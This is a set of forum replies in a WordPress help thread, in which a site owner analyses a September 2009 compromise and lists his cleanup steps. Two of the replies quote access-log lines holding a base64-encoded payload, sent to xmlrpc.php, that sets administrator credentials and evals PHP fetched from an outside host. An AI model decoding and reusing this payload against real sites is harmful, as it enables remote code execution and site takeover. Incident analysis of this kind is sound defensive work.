rwboyer
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteProbably not required but you need to be sure of dealing with every single compromised file in your system.
Sometimes depending on where you are at and your current operations it is easier to do that.
I happen to keep an pristine version of everything I run (entire config, plugins, etc) around so I can just deploy it in an instant.
RB
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteYou are technically correct but the big damage comes in the xmlrpc.php post. At least from my standpoint of system integrity. In any case disable the options-permalink as well for a lockout. I am keeping one or two of my lower volume sites open and just to see if I can track this fool down.
RB
Forum: Fixing WordPress
In reply to: Question About Possible Hack of Site@marc = agree it looks to be in the newest code.
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteA couple of other preliminary notes:
My reaction to this has been –
1) Immediately creating a new NameVirtualServer and installing a pristine php code base for WP and all of my plug-ins
2) deleting all users registered in September from my database
3) temporarily disabling xmlrpc.php until I have a full understanding of the entire attack sequence.
4) changing all of my passwords (do not forget that the database user/pass is plain text in the config.php
5) fire walled a few blocks of IP addresses that seemed to correlate to ssh password attacks and this exploit from a timing perspective.
This only took about 5 minutes for a bunch of sites/clients but better safe than sorry. The biggest deal for my sites was regeneration of the cache’s on some of my higher volume sites caused some degree of outage.
I also have reason to believe the attack may register a user prior to the actual exploit but I don’t know why yet and it may just be a red herring.
RB
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteJust my 2¢ –
The xmlrpc.php POST that I put up a few hours ago is the hack I looked through the entire sequence in my access logs – the modified/new files come after the hack. Here is the entire opening sequence for the hack in question. I had to move all of my data to a pristine code base in a new NameVirtualServer and am still tweaking some of my caching and thing to get everything back to normal so I have not had time to dig through my IP dumps at the time of the exploit to see what else may have been in the attack payload but I will get around to it.
Here is the entire opening sequence from my access logs:
48195 122.135.85.220 - - [04/Sep/2009:04:53:21 -0400] "GET /wp-login.php HTTP/1. 1" 200 1948 "https://photo.rwboyer.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3" 48196 122.135.85.220 - - [04/Sep/2009:04:53:24 -0400] "POST /wp-login.php HTTP/1 .1" 302 - "https://photo.rwboyer.com/wp-login.php" "Mozilla/5.0 (Windows; U ; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3" 48197 122.135.85.220 - - [04/Sep/2009:04:53:28 -0400] "GET /wp-admin/ HTTP/1.1" 200 34669 "https://photo.rwboyer.com/wp-login.php" "Mozilla/5.0 (Windows; U ; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3" 48198 122.135.85.220 - - [04/Sep/2009:04:53:34 -0400] "GET /wp-admin//options-pe rmalink.php HTTP/1.1" 200 15153 "https://photo.rwboyer.com/wp-admin//option s-permalink.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3" 48199 122.135.85.220 - - [04/Sep/2009:04:53:37 -0400] "POST /wp-admin//options-p ermalink.php HTTP/1.1" 200 15312 "https://photo.rwboyer.com/wp-admin//optio ns-permalink.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3" 48200 122.135.85.220 - - [04/Sep/2009:04:53:41 -0400] "POST /xmlrpc.php HTTP/1.1 " 200 173 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzk nOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c DovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7" " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Fir efox/0.9.3"RB
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteI think I have found the hack and the source. According to my access logs this appears to be the hack:
48200 122.135.85.220 – – [04/Sep/2009:04:53:41 -0400] “POST /xmlrpc.php HTTP/1.1 ” 200 173 “JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzk nOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c DovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7″ ” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Fir efox/0.9.3″
and the source as you can see appears to be IP 122.135.85.220
Anyone else out there that can confirm. I just looked as I found the problem and moved all of my data to a non-hacked server earlier on a new virtual server. So now I am looking at the cause.
RB